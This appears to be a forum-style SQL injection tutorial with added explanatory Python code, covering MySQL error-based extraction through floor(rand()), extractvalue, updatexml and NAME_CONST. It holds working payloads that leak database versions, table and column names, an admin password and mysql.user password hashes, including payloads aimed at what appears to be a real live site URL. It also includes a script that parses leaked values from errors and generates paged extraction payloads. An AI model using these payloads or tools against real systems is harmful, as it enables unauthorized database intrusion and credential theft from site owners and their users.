1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Both rely on the same behaviour: GROUP BY on a key that contains floor(rand(0)*2) makes MySQL insert a group key it has already stored, and the resulting ERROR 1062 echoes the key, with the injected subquery's value inside it. The grouped table must have at least three rows, which is why the first form groups over information_schema.tables and the second over a three-row union. The subquery has to return exactly one value (hence the limit 1).

For example, first a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement forces the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. The trailing 1 is the floor(rand(0)*2) digit that was concatenated onto the value, not part of the version string. To read other data, replace the version() expression with the desired subquery.

For example, to retrieve the administrator's credentials from the admin table:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

In both cases the password is admin888; again the final 1 is the rand digit.

2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

The 0x5c (backslash) prefix makes the second argument an invalid XPath expression, so the server echoes it back in the error. extractvalue() and updatexml() exist from MySQL 5.1.5 onwards, and the XPATH error message shows at most 32 characters of the expression, so longer values must be read in pieces with substr().

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Here 0x3a (a colon) plays the same role as the backslash above; any character that cannot start an XPath expression will do.
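Why the floor() payload in section 1 errors, as an added illustration that is not part of the original post: MySQL's GROUP BY collects groups in a temporary table, evaluating the key expression once to look a group up and a second time when it inserts a group it did not find. With a seeded RAND(0) the two evaluations return different values, so the inserted key can collide with a group created earlier. The Python model below is my own code, not MySQL's; it replays that double evaluation using the published floor(rand(0)*2) sequence, whose first three values are 0, 1, 1 (an assumption recorded in the code), and shows that the error fires on the third source row and never with fewer rows, which is why the payloads group over information_schema.tables or a three-row union.

```python
"""Model of why `floor(rand(0)*2)` + GROUP BY raises MySQL ERROR 1062.

The grouping key is evaluated twice per new group: once to probe the temporary
table and once to build the row that is inserted.  A volatile key (rand) can
therefore be inserted under a name that already exists, and MySQL reports the
colliding key, which carries the injected subquery's value.
"""
from typing import Dict, Iterable, Optional

# Assumption: the first values of floor(rand(0)*2) as given in published
# analyses of this technique.  Only the first three (0, 1, 1) matter here.
RAND0_FLOOR_SEQUENCE = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1]


class DuplicateEntry(Exception):
    """Stand-in for MySQL ERROR 1062 (23000); str(exc) is the colliding key."""


def group_by_with_volatile_key(n_rows: int, leaked: str,
                               rand_values: Iterable[int] = RAND0_FLOOR_SEQUENCE
                               ) -> Dict[str, int]:
    """Simulate `select count(*), concat(leaked, floor(rand(0)*2)) x ... group by x`
    over a source table with n_rows rows.  Returns the finished groups, or raises
    DuplicateEntry with the key exactly as MySQL would print it."""
    rand_iter = iter(rand_values)
    groups: Dict[str, int] = {}
    for _ in range(n_rows):
        probe_key = f"{leaked}{next(rand_iter)}"      # 1st evaluation: lookup
        if probe_key in groups:
            groups[probe_key] += 1
            continue
        insert_key = f"{leaked}{next(rand_iter)}"     # 2nd evaluation: insert
        if insert_key in groups:
            raise DuplicateEntry(insert_key)
        groups[insert_key] = 1
    return groups


def error_message(n_rows: int, leaked: str) -> Optional[str]:
    """Return the MySQL-style error text the payload would produce, or None
    when the grouped table has too few rows for the collision to happen."""
    try:
        group_by_with_volatile_key(n_rows, leaked)
    except DuplicateEntry as exc:
        return f"ERROR 1062 (23000): Duplicate entry '{exc}' for key 'group_key'"
    return None


def recover_leaked_value(message: str) -> str:
    """Pull the quoted key out of the error and drop the rand digit
    that floor(rand(0)*2) appended to the injected value."""
    start = message.index("'") + 1
    end = message.index("'", start)
    return message[start:end][:-1]


if __name__ == "__main__":
    for rows in (1, 2, 3):
        print(f"{rows} row(s):", error_message(rows, "5.1.33-community-log"))
```

Trace for three rows: the first row probes "...0", misses, and is inserted as "...1"; the second probes "...1" and hits; the third probes "...0", misses, and is inserted as "...1" again, which is the duplicate. With an unseeded rand() the sequence is random and the error only fires sometimes, so the seeded rand(0) is what makes the payload reliable.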
More collected examples (NAME_CONST):

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Here name_const() names the single column of each derived table after the value being extracted; joining two such tables produces two identically named columns, which MySQL rejects with ERROR 1060 "Duplicate column name", echoing the value in the message.
MySQL error-based injection for newer versions: injecting with NAME_CONST

NAME_CONST() exists from MySQL 5.0.12 and its two arguments are required to be constants. Later builds reject a non-constant argument such as a subquery with ERROR 1210 "Incorrect arguments to NAME_CONST", so the data-extraction payloads in the tutorial below work only on the 5.0.x builds that did not enforce this; that is the failure the author mentions hitting on some sites.

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable.

MySQL 5.1.3 Server System Variables

Both NAME_CONST() calls give their column the same name, so the derived table x has two identically named columns and MySQL refuses the query with ERROR 1060 "Duplicate column name", putting the name, that is the value of VAR, in the message.

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

To walk through the remaining tables, step the limit offset (limit+1,1, limit+2,1, and so on).
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this (0x6d7973716c is the hex of "mysql" and 0x75736572 the hex of "user", which avoids quotes in the payload), and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

0x207e20 is " ~ ", so the two columns come back as User ~ Password; the leading * marks MySQL's 41-character SHA1-based password hash format.

And there we have it, thanks for reading.
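Every technique on this page (floor(), extractvalue(), updatexml() in sections 1 to 3, and NAME_CONST in the collected examples and the tutorial above) returns the data inside a MySQL error message, each with its own framing: the floor() variant appends the rand digit, the XPATH variants carry the injected delimiter and are cut at 32 characters, and the NAME_CONST variant wraps the value in "Duplicate column name". The parser below is an added example, not code from the original post or its author; the sample error lines are constructed from the outputs shown on this page, and the regular expressions and function names are this example's own.

```python
"""Recover the leaked value from the error-message shapes used on this page.

  floor/rand:   ERROR 1062 (23000): Duplicate entry '<value><digit>' for key 'group_key'
  extractvalue / updatexml:
                ERROR 1105 (HY000): XPATH syntax error: '<delimiter><value>'
  name_const:   ... Duplicate column name '<value>'        (MySQL ERROR 1060)
"""
import re
from typing import Iterator, List, Optional, Tuple

# MySQL echoes at most this many characters of an invalid XPath expression.
XPATH_ERROR_LIMIT = 32

# Order matters only for readability; the three patterns never overlap.
PATTERNS = [
    ("floor", re.compile(r"Duplicate entry '(?P<v>.*)' for key 'group_key'")),
    ("xpath", re.compile(r"XPATH syntax error: '(?P<v>.*)'")),
    # The closing quote is optional: some pages print the error truncated.
    ("name_const", re.compile(r"Duplicate column name '(?P<v>[^']*)'?")),
]

# Constructed samples, copied from the error outputs shown on this page.
SAMPLE_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "Error: Duplicate column name '5.0.27-community-nt'",
    "Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'",
]


def extract_leak(message: str) -> Optional[Tuple[str, str]]:
    """Return (technique, leaked_value) for a recognised error line, else None."""
    for technique, pattern in PATTERNS:
        match = pattern.search(message)
        if not match:
            continue
        value = match.group("v")
        if technique == "floor":
            value = value[:-1]      # drop the floor(rand(0)*2) digit
        elif technique == "xpath":
            value = value[1:]       # drop the 0x5c / 0x3a delimiter
        return technique, value
    return None


def xpath_may_be_truncated(value: str) -> bool:
    """A value that fills the whole 32-character window minus the delimiter
    may have been cut by the server; page it with substr() to be sure."""
    return len(value) >= XPATH_ERROR_LIMIT - 1


def split_concat_ws(value: str, separator: str = " ~ ") -> List[str]:
    """Undo concat_ws(0x207e20, ...) (0x207e20 is ' ~ ') into its columns."""
    return value.split(separator)


def xpath_paging_payloads(inner_query: str, total_length: int) -> Iterator[str]:
    """Yield the extractvalue() payloads needed to read a value of total_length
    characters 31 at a time (one slot of the 32-character window goes to the
    delimiter).  total_length would come from a prior length() leak."""
    window = XPATH_ERROR_LIMIT - 1
    for start in range(1, total_length + 1, window):
        yield (f"and extractvalue(1, concat(0x5c, "
               f"substr(({inner_query}),{start},{window})))")


if __name__ == "__main__":
    for line in SAMPLE_ERRORS:
        print(extract_leak(line))
    for payload in xpath_paging_payloads("select pass from admin limit 1", 70):
        print(payload)
```

The floor() and NAME_CONST variants are not subject to the 32-character limit, so a long password hash comes back whole there (as the mysql.user example shows), whereas the XPATH variants need the substr() paging.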